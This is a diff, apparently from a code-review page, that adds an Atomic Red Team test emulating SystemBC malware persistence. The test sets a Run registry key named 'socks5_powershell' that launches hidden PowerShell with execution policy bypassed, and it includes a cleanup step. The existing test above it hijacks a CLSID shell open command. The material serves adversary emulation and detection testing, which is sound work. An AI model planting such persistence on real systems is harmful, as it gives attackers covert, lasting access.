CyberBilly7
@@ -151,3 +151,27 @@ atomic_tests:
|
||||
command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f
|
||||
cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
|
||||
name: command_prompt
|
||||
|
||||
- name: SystemBC Malware-as-a-Service Registry
|
||||
description: |
|
||||
This Atomic will create a registry key called socks5_powershell for persistance access
|
||||
https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
reg_key_value:
|
||||
description: Thing to Run
|
||||
type: Path
|
||||
default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File
|
||||
reg_key_path:
|
||||
description: Path to registry key to update
|
||||
type: Path
|
||||
default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
|
||||
executor:
|
||||
command: |
|
||||
$RunKey = "#{reg_key_path}"
|
||||
Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
|
||||
cleanup_command: |
|
||||
Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore
|
||||
name: powershell
|
||||
|
||||
|
||||
Reference in New Issue
Block a user